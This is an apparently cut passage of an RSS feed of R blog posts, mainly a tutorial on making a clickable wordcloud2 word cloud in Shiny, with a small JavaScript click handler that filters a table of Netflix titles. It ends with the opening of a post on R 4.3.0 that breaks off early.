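words and the second as the frequencies.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Toy word counts: the values are invented purely for illustration
toy_counts = data.frame(
  word = c(&amp;#34;love&amp;#34;, &amp;#34;christmas&amp;#34;, &amp;#34;story&amp;#34;),
  n = c(12, 7, 5)
)

# First column holds the words, second column holds the frequencies
wordcloud2::wordcloud2(toy_counts)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;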
&lt;p&gt;Before creating the word cloud, we need to read in our data using the
&lt;a href="https://github.com/rfordatascience/tidytuesday" rel="external"&gt;{tidytuesdayR}&lt;/a&gt;
package. If you want to see the full source code for the final Shiny
app, &lt;a href="https://github.com/jumpingrivers/blog" rel="external"&gt;check out our GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tuesdata &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tidytuesdayR&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tt_load&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2021-04-20&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;netflix_titles &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tuesdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;netflix_titles
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To create our word count data frame, we will use a combination of
&lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;{dplyr}&lt;/a&gt; and
&lt;a href="https://github.com/juliasilge/tidytext" rel="external"&gt;{tidytext}&lt;/a&gt; functions. We
filter out words that are used in 10 titles or fewer to prevent our word
cloud from being too crowded.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidytext&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;word_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; netflix_titles &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;word&amp;#34;&lt;/span&gt;, title) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;anti_join&lt;/span&gt;(stop_words, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;word&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(word) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;word_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 157 × 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## word n&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 love 151&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 115&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 christmas 78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 story 67&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 life 65&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 world 63&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 movie 60&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 time 54&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 de 46&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 american 45&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 147 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then we just need to pass this word count data frame into the
&lt;code&gt;wordcloud2()&lt;/code&gt; function. We’re using a custom colour palette instead of
the default one. &lt;code&gt;wordcloud2()&lt;/code&gt; requires a colour palette vector of the
same length as the data set, so you can use the &lt;code&gt;rep_len()&lt;/code&gt; function to
achieve this.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;wordcloud2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;#355070&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#6d597a&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#b56576&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#e56b6f&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#eaac8b&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_wordcloud &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;wordcloud2&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; word_counts,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep_len&lt;/span&gt;(my_palette,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(word_counts)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="A word cloud generated by wordcloud2" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/wordcloud.png" width="1146"&gt;&lt;/p&gt;
&lt;p&gt;The {wordcloud2} package contains two functions for incorporating word
clouds in a Shiny app: &lt;code&gt;wordcloud2Output()&lt;/code&gt; and &lt;code&gt;renderWordcloud2()&lt;/code&gt;.
These work in the same way as most &lt;code&gt;*Output()&lt;/code&gt; and &lt;code&gt;render*()&lt;/code&gt;
functions.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;wordcloud2Output&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;wordcloud&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;wordcloud &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderWordcloud2&lt;/span&gt;(my_wordcloud)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="binding-a-javascript-click-event-to-a-shiny-input"&gt;Binding a JavaScript click event to a Shiny input&lt;/h3&gt;
&lt;p&gt;Now to the key part of this blog post. We want to be able to click on a
word in the word cloud, and use the clicked word as an input in Shiny.
We need to write some JavaScript for this, which will be wrapped in the
&lt;code&gt;HTML()&lt;/code&gt; function within a &lt;code&gt;script&lt;/code&gt; tag (&lt;code&gt;tags$script()&lt;/code&gt;). We are
writing an anonymous function, i.e. an unnamed function, which will be
run whenever we click on a word in the word cloud. The function will
extract the text content of the label produced when we hover over a
word, and then send this to Shiny as an input called &lt;code&gt;clicked_word&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;HTML&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;$(document).on(&amp;#39;click&amp;#39;, &amp;#39;#canvas&amp;#39;, function() {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; word = $(&amp;#39;#wcLabel&amp;#39;).text();
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; Shiny.onInputChange(&amp;#39;clicked_word&amp;#39;, word);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; });&amp;#34;&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;wordcloud2Output&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;wordcloud&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, we can use &lt;code&gt;input$clicked_word&lt;/code&gt; in our Shiny server to filter the
Netflix titles to retain only the titles which contain that specific
word. We use a combination of {dplyr} and
&lt;a href="https://stringr.tidyverse.org/" rel="external"&gt;{stringr}&lt;/a&gt; to do this. The input also
contains the count, e.g. “love: 151”, so we first need to use a regular
expression to remove the colon and any numbers after it.&lt;/p&gt;
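&lt;p&gt;As a quick check of the pattern outside the app, here is a minimal sketch using base R’s &lt;code&gt;sub()&lt;/code&gt; in place of &lt;code&gt;str_remove()&lt;/code&gt;. The label strings are made up for illustration rather than captured from the app, and the pattern also tolerates whitespace after the colon, on the assumption that a label might arrive as “love: 151” rather than “love:151”.&lt;/p&gt;

```r
# Hypothetical label strings, standing in for input$clicked_word
labels = c("love:151", "love: 151", "christmas:78")

# Drop the colon, any whitespace after it, and the trailing digits
words = sub(":[[:space:]]*[0-9]+$", "", labels)
print(words)
```

&lt;p&gt;If every label comes back as a bare word, the same pattern should be safe to use inside the reactive expression.&lt;/p&gt;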
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;wordcloud &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderWordcloud2&lt;/span&gt;(my_wordcloud)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filtered_netflix &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactive&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clicked_word &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;clicked_word, &lt;span style="color:#a5d6ff"&gt;&amp;#34;:[0-9]+$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; netflix_titles &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_detect&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tolower&lt;/span&gt;(title), clicked_word)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(title, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;everything&lt;/span&gt;(), &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;show_id)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The final step is to create an output table of the filtered data. We use
the &lt;code&gt;renderDT()&lt;/code&gt; and &lt;code&gt;DTOutput()&lt;/code&gt; functions from &lt;code&gt;{DT}&lt;/code&gt; to do this, but
you can use any package for creating tables.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;DT&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;DTOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;filtered_tbl&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;filtered_tbl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderDT&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filtered_netflix&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="Table of Netflix titles filtered by clicking a word in the word cloud" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/filtered_table.png" width="1248"&gt;&lt;/p&gt;
&lt;p&gt;Now, you should have an interactive word cloud input which allows you to
filter a table based on whichever word you click! You can of course use
the word input for something else, for example, you could re-render the
word cloud every time you click a word to show you the words which are
most often used together with your clicked word, or you could use the
input to create some further visualisations.&lt;/p&gt;
&lt;p&gt;If you’re interested in learning more about Shiny, check out our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny
in Production&lt;/a&gt;
conference, taking place October 12th-13th in Newcastle upon Tyne. We’ll
be focussing on all things Shiny as well as other web-based R packages,
with an afternoon of workshops run by our JR trainers, followed by a day
of talks from R experts!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>What's new in R 4.3.0?</title><link>https://www.jumpingrivers.com/blog/whats-new-r43/</link><pubDate>Thu, 20 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/whats-new-r43/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r43/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/whats-new-r43/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Logic will get you from A to B. Imagination will take you everywhere.
(Einstein)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;R can already take you everywhere. With it we can learn about the
minutest particles and the largest galaxies. So, to celebrate the
release of R 4.3 (“Already Tomorrow”, on April 21st, 2023), let’s
reverse Einstein’s quote and take you from A to B with logic.&lt;/p&gt;
&lt;h3 id="two-modes-of-comparison"&gt;Two modes of comparison&lt;/h3&gt;
&lt;!--- Compare &amp;&amp; with &amp; --&gt;
&lt;p&gt;In R, almost all of your data will be stored as a vector. Even if your
vector holds a single value it is still considered to be a vector by R.
This is unlike many other languages, and getting comfortable thinking
about the whole vector at once pays off in several ways: your code will
be more concise, and it may even run quicker than an iterative approach
to the same problem.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# A vector of integers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 1 2 3 4 5 6 7 8 9 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.vector&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# A vectorised computation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 55&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;integer&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# An empty vector of integers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## integer(0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1L&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# A single integer, stored as a vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;!--- Example 1:10 is a vector; 1 is a vector --&gt;
&lt;!--- Example x = 1:10; x + 1 vs x = 1:10; y &lt;- sapply(function(z) z + 1, x) --&gt;
